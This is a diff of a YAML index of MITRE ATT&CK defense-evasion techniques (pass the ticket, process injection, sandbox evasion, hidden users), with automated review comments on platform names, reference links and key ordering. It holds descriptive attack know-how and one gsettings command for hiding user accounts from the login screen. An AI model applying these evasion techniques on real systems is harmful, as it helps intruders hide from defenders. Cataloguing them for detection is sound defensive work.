- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-01T20:43:55.632Z'
name: Component Firmware
description: |-
Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other system components/devices that may not have the same capability or level of integrity checking.
@@ -8464,12 +8584,10 @@ defense-evasion:
- SYSTEM
x_mitre_system_requirements:
- Ability to update component device firmware from the host operating system.
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1070:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:59:22.125Z'
name: Indicator Removal on Host
description: |-
Adversaries may delete or modify artifacts generated within systems to remove evidence of their presence or hinder defenses. Various artifacts may be created by an adversary or something that can be attributed to an adversary’s actions. Typically these artifacts are used as defensive indicators related to monitored events, such as strings from downloaded files, logs that are generated from user actions, and other data analyzed by defenders. Location, format, and type of artifact (such as command or login history) are often specific to each platform.
@@ -8495,9 +8613,8 @@ defense-evasion:
- Windows
- Containers
- Network
- - Office 365
- - Google Workspace
- x_mitre_version: '2.1'
+ - Office Suite
+ x_mitre_version: '2.2'
x_mitre_data_sources:
- 'Scheduled Job: Scheduled Job Modification'
- 'File: File Modification'
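Review bot: replacing `Office 365` and `Google Workspace` with the single platform `Office Suite` in `x_mitre_platforms` changes the key that per-platform index files are built from, so T1070 will drop out of any Office 365 or Google Workspace index unless the index generator maps `Office Suite` back to both of the old platform names; check the generated platform index CSVs in this PR for T1070 before merging. The version only bumps from `2.1` to `2.2` while the platform taxonomy changed, which is consistent with an upstream platform rename rather than a content change and is worth a sentence in the PR description.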
@@ -8528,14 +8645,13 @@ defense-evasion:
external_id: T1070
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1070
atomic_tests: []
T1550.003:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-09-12T15:21:09.330Z'
name: 'Use Alternate Authentication Material: Pass the Ticket'
description: |-
Adversaries may “pass the ticket” using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.
@@ -8555,6 +8671,7 @@ defense-evasion:
x_mitre_contributors:
- Vincent Le Toux
- Ryan Becwar
+ x_mitre_deprecated: false
x_mitre_detection: |-
Audit all Kerberos authentication and credential use events and review for discrepancies. Unusual remote authentication events that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity.
@@ -8562,7 +8679,6 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
@@ -8578,34 +8694,35 @@ defense-evasion:
id: attack-pattern--7b211ac6-c815-4189-93a9-ab415deca926
created: '2020-01-30T17:03:43.072Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1550/003
external_id: T1550.003
- - source_name: ADSecurity AD Kerberos Attacks
- description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
- Kerberos Attacks. Retrieved June 2, 2016.
- url: https://adsecurity.org/?p=556
- - source_name: GentilKiwi Pass the Ticket
- description: Deply, B. (2014, January 13). Pass the ticket. Retrieved June
- 2, 2016.
- url: http://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+ - source_name: CERT-EU Golden Ticket Protection
+ description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
+ April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
+ url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
- source_name: Campbell 2014
description: Campbell, C. (2014). The Secret Life of Krbtgt. Retrieved December
4, 2014.
url: http://defcon.org/images/defcon-22/dc-22-presentations/Campbell/DEFCON-22-Christopher-Campbell-The-Secret-Life-of-Krbtgt.pdf
+ - source_name: GentilKiwi Pass the Ticket
+ description: Deply, B. (2014, January 13). Pass the ticket. Retrieved September
+ 12, 2024.
+ url: https://web.archive.org/web/20210515214027/https://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+ - source_name: ADSecurity AD Kerberos Attacks
+ description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
+ Kerberos Attacks. Retrieved June 2, 2016.
+ url: https://adsecurity.org/?p=556
- source_name: Stealthbits Overpass-the-Hash
description: Warren, J. (2019, February 26). How to Detect Overpass-the-Hash
Attacks. Retrieved February 4, 2021.
url: https://stealthbits.com/blog/how-to-detect-overpass-the-hash-attacks/
- - source_name: CERT-EU Golden Ticket Protection
- description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
- April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
- url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1550.003
atomic_tests: []
T1036.004:
@@ -8671,7 +8788,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1036.004
atomic_tests: []
T1055.004:
@@ -8710,7 +8826,7 @@ defense-evasion:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:23:46.476Z'
name: 'Process Injection: Asynchronous Procedure Call'
description: "Adversaries may inject malicious code into processes via the asynchronous
procedure call (APC) queue in order to evade process-based defenses as well
@@ -8759,8 +8875,6 @@ defense-evasion:
x_mitre_defense_bypassed:
- Application control
- Anti-virus
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.004
atomic_tests: []
T1647:
@@ -8811,7 +8925,7 @@ defense-evasion:
pairs to insert environment variables, such as LSEnvironment
,
to enable persistence via [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006).(Citation:
wardle chp2 persistence)(Citation: eset_osx_flashback)"
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T22:00:33.375Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Plist File Modification
x_mitre_detection: "Monitor for common command-line editors used to modify plist
@@ -8832,7 +8946,6 @@ defense-evasion:
- 'File: File Modification'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1647
atomic_tests:
- name: Plist Modification
@@ -8918,7 +9031,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1553.005
atomic_tests: []
T1600.002:
@@ -8941,7 +9053,7 @@ defense-evasion:
url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
description: Omar Santos. (2020, October 19). Attackers Continue to Target
Legacy Devices. Retrieved October 20, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-21T22:37:48.503Z'
name: Disable Crypto Hardware
description: |-
Adversaries disable a network device’s dedicated hardware encryption, which may enable them to leverage weaknesses in software encryption in order to reduce the effort involved in collecting, manipulating, and exfiltrating transmitted data.
@@ -8962,8 +9074,6 @@ defense-evasion:
- 'File: File Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1542:
technique:
@@ -9024,11 +9134,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1612:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-15T16:22:09.807Z'
name: Build Image on Host
description: "Adversaries may build a container image directly on a host to
bypass defenses that monitor for the retrieval of malicious images from a
@@ -9093,7 +9202,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1612
atomic_tests: []
T1055.002:
@@ -9117,7 +9225,7 @@ defense-evasion:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:21:11.178Z'
name: 'Process Injection: Portable Executable Injection'
description: "Adversaries may inject portable executables (PE) into processes
in order to evade process-based defenses as well as possibly elevate privileges.
@@ -9161,8 +9269,6 @@ defense-evasion:
- Application control
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.002
atomic_tests: []
T1218.012:
@@ -9218,7 +9324,7 @@ defense-evasion:
not account for its potential abuse.(Citation: LOLBAS Verclsid)(Citation:
Red Canary Verclsid.exe)(Citation: BOHOPS Abusing the COM Registry)(Citation:
Nick Tyrer GitHub) "
- modified: '2022-10-25T14:00:00.188Z'
+ modified: '2022-05-20T17:35:28.221Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Verclsid
x_mitre_detection: Use process monitoring to monitor the execution and arguments
@@ -9242,7 +9348,6 @@ defense-evasion:
- Digital Certificate Validation
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1562.010:
technique:
@@ -9333,40 +9438,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562.010
atomic_tests: []
T1497:
technique:
- x_mitre_platforms:
- - Windows
- - macOS
- - Linux
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Deloitte Threat Library Team
- - Sunny Neo
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
- type: attack-pattern
- created: '2019-04-17T22:22:24.505Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1497
- url: https://attack.mitre.org/techniques/T1497
- - source_name: Deloitte Environment Awareness
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
- description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- - source_name: Unit 42 Pirpi July 2015
- url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
- description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
- on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
- 23, 2019.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-12T15:50:18.049Z'
name: Virtualization/Sandbox Evasion
description: |+
Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)
@@ -9378,6 +9454,10 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Deloitte Threat Library Team
+ - Sunny Neo
+ x_mitre_deprecated: false
x_mitre_detection: Virtualization, sandbox, user activity, and related discovery
techniques will likely occur in the first steps of an operation but may also
occur throughout as an adversary learns the environment. Data and events should
@@ -9388,8 +9468,14 @@ defense-evasion:
required. Monitoring for suspicious processes being spawned that gather a
variety of system information or perform other forms of Discovery, especially
in a short period of time, may aid in detection.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
x_mitre_version: '1.3'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Process: Process Creation'
@@ -9399,9 +9485,28 @@ defense-evasion:
- Host forensic analysis
- Signature-based detection
- Static File Analysis
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
+ created: '2019-04-17T22:22:24.505Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1497
+ external_id: T1497
+ - source_name: Unit 42 Pirpi July 2015
+ description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
+ on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
+ 23, 2019.'
+ url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
+ - source_name: Deloitte Environment Awareness
+ description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1218.005:
technique:
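Review bot: the `Deloitte Environment Awareness` URL now ends in `/edit` (`https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit`) instead of the bare file link used before; a Google Drive `/edit` URL is the editor view and typically prompts for sign-in or a share request for readers without edit rights, while the bare link or `/view` is the public read-only form. Since the retrieval date was refreshed to September 13, 2024, confirm the link opens anonymously, or keep the previous bare form.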
@@ -9454,7 +9559,7 @@ defense-evasion:
- source_name: LOLBAS Mshta
url: https://lolbas-project.github.io/lolbas/Binaries/Mshta/
description: LOLBAS. (n.d.). Mshta.exe. Retrieved July 31, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T20:38:28.802Z'
name: 'Signed Binary Proxy Execution: Mshta'
description: "Adversaries may abuse mshta.exe to proxy execution of malicious
.hta files and Javascript or VBScript through a trusted Windows utility. There
@@ -9492,68 +9597,72 @@ defense-evasion:
- Digital Certificate Validation
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1218.005
atomic_tests: []
T1480:
technique:
+ modified: '2024-06-07T14:30:23.491Z'
+ name: Execution Guardrails
+ description: |-
+ Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.(Citation: FireEye Outlook Dec 2019)
+
+ Guardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.
+
+ Adversaries may identify and block certain user-agents to evade defenses and narrow the scope of their attack to victims and platforms on which it will be most effective. A user-agent self-identifies data such as a user's software application, operating system, vendor, and version. Adversaries may check user-agents for operating system identification and then only serve malware for the exploitable software while ignoring all other operating systems.(Citation: Trellix-Qakbot)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Nick Carr, Mandiant
+ x_mitre_deprecated: false
+ x_mitre_detection: Detecting the use of guardrails may be difficult depending
+ on the implementation. Monitoring for suspicious processes being spawned that
+ gather a variety of system information or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007),
+ especially in a short period of time, may aid in detection.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Linux
- macOS
- Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Nick Carr, Mandiant
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_version: '1.2'
+ x_mitre_data_sources:
+ - 'Process: Process Creation'
+ - 'Command: Command Execution'
+ x_mitre_defense_bypassed:
+ - Anti-virus
+ - Host Forensic Analysis
+ - Signature-based Detection
+ - Static File Analysis
type: attack-pattern
id: attack-pattern--853c4192-4311-43e1-bfbb-b11b14911852
created: '2019-01-31T02:10:08.261Z'
- x_mitre_version: '1.1'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1480
url: https://attack.mitre.org/techniques/T1480
+ external_id: T1480
- source_name: FireEye Outlook Dec 2019
- url: https://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-page-attacks.html
description: 'McWhirt, M., Carr, N., Bienstock, D. (2019, December 4). Breaking
the Rules: A Tough Outlook for Home Page Attacks (CVE-2017-11774). Retrieved
June 23, 2020.'
+ url: https://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-page-attacks.html
+ - source_name: Trellix-Qakbot
+ description: Pham Duy Phuc, John Fokker J.E., Alejandro Houspanossian and
+ Mathanraj Thangaraju. (2023, March 7). Qakbot Evolves to OneNote Malware
+ Distribution. Retrieved June 7, 2024.
+ url: https://www.trellix.com/blogs/research/qakbot-evolves-to-onenote-malware-distribution/
- source_name: FireEye Kevin Mandia Guardrails
- url: https://www.cyberscoop.com/kevin-mandia-fireeye-u-s-malware-nice/
description: Shoorbajee, Z. (2018, June 1). Playing nice? FireEye CEO says
U.S. malware is more restrained than adversaries'. Retrieved January 17,
2019.
- x_mitre_deprecated: false
- revoked: false
- description: |-
- Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.(Citation: FireEye Outlook Dec 2019)
-
- Guardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.
- modified: '2022-05-24T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Execution Guardrails
- x_mitre_detection: Detecting the use of guardrails may be difficult depending
- on the implementation. Monitoring for suspicious processes being spawned that
- gather a variety of system information or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007),
- especially in a short period of time, may aid in detection.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- x_mitre_is_subtechnique: false
- x_mitre_data_sources:
- - 'Process: Process Creation'
- - 'Command: Command Execution'
- x_mitre_defense_bypassed:
- - Anti-virus
- - Host Forensic Analysis
- - Signature-based Detection
- - Static File Analysis
- x_mitre_attack_spec_version: 2.1.0
+ url: https://www.cyberscoop.com/kevin-mandia-fireeye-u-s-malware-nice/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1134.001:
technique:
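Review bot: the `FireEye Outlook Dec 2019` reference keeps its `https://www.fireeye.com/blog/threat-research/...` URL with a June 2020 retrieval date, even though this patch elsewhere (the `GentilKiwi Pass the Ticket` reference in the T1550.003 hunk) replaces a moved blog URL with a `web.archive.org` snapshot and a refreshed retrieval date; verify the fireeye.com path still resolves and, if it redirects or 404s, apply the same archive treatment here. The rest of this hunk is a pure key reordering of T1480 plus the new user-agent paragraph and the `Trellix-Qakbot` reference, so a stable key order in the generator would make future diffs of this kind reviewable at a glance.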
@@ -9611,7 +9720,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1134.001
atomic_tests: []
T1205.001:
@@ -9637,7 +9745,7 @@ defense-evasion:
description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
backdoor. Retrieved October 13, 2018.'
source_name: Hartrell cd00r 2002
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T18:31:23.996Z'
name: Port Knocking
description: |-
Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.
@@ -9662,8 +9770,6 @@ defense-evasion:
- 'Network Traffic: Network Traffic Flow'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1027.012:
technique:
@@ -9724,7 +9830,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1564.002:
technique:
@@ -9797,7 +9902,7 @@ defense-evasion:
sudo -u gdm gsettings set org.gnome.login-screen disable-user-list true
).(Citation:
Hide GDM User Accounts) Display Managers are not anchored to specific distributions
and may be changed by a user or adversary."
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T02:31:01.315Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Hide Artifacts: Hidden Users'
x_mitre_detection: "Monitor for users that may be hidden from the login screen
@@ -9826,7 +9931,6 @@ defense-evasion:
- 'User Account: User Account Metadata'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1564.002
atomic_tests:
- name: Create Hidden User using UniqueID < 500
@@ -9933,11 +10037,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1562.003:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:47.940Z'
name: 'Impair Defenses: Impair Command History Logging'
description: "Adversaries may impair command history logging to hide commands
they run on a compromised system. Various command interpreters keep track
@@ -10022,7 +10125,6 @@ defense-evasion:
url: https://community.sophos.com/products/malware/b/blog/posts/powershell-command-history-forensics
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1562.003
atomic_tests:
- name: Disable history collection
@@ -10062,7 +10164,7 @@ defense-evasion:
name: manual
T1556.008:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-05-04T18:02:51.318Z'
name: Network Provider DLL
description: "Adversaries may register malicious network provider dynamic link
libraries (DLLs) to capture cleartext user credentials during the authentication
@@ -10137,45 +10239,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1497.002:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Deloitte Threat Library Team
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
- type: attack-pattern
- created: '2020-03-06T21:04:12.454Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1497.002
- url: https://attack.mitre.org/techniques/T1497/002
- - source_name: Deloitte Environment Awareness
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
- description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- - source_name: Sans Virtual Jan 2016
- url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
- description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
- Evasion Techniques. Retrieved April 17, 2019.
- - source_name: Unit 42 Sofacy Nov 2018
- url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
- description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
- Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
- - url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
- description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
- LNK. Retrieved April 24, 2017.
- source_name: FireEye FIN7 April 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-12T15:50:18.050Z'
name: User Activity Based Checks
description: "Adversaries may employ various user activity checks to detect
and avoid virtualization and analysis environments. This may include changing
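Review bot: this hunk removes the entire header of T1497.002 (`x_mitre_platforms`, `x_mitre_domains`, `x_mitre_contributors`, `object_marking_refs`, `id`, `type`, `created`, `created_by_ref`, `external_references`), and the same keys reappear in the three hunks that follow at the bottom of the entry, so it is a key reorder rather than a data loss. The reorder buries the entry's only real changes (the `modified` bump to `2024-09-12T15:50:18.050Z` and the reference updates) in ~75 lines of churn; emitting keys in a stable order from the generator would make these syncs reviewable.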
@@ -10199,6 +10266,9 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Deloitte Threat Library Team
+ x_mitre_deprecated: false
x_mitre_detection: 'User activity-based checks will likely occur in the first
steps of an operation but may also occur throughout as an adversary learns
the environment. Data and events should not be viewed in isolation, but as
@@ -10209,9 +10279,14 @@ defense-evasion:
processes being spawned that gather a variety of system information or perform
other forms of Discovery, especially in a short period of time, may aid in
detection. '
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: OS API Execution'
- 'Process: Process Creation'
@@ -10221,8 +10296,35 @@ defense-evasion:
- Static File Analysis
- Signature-based detection
- Host forensic analysis
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
+ created: '2020-03-06T21:04:12.454Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1497/002
+ external_id: T1497.002
+ - source_name: FireEye FIN7 April 2017
+ description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
+ LNK. Retrieved April 24, 2017.
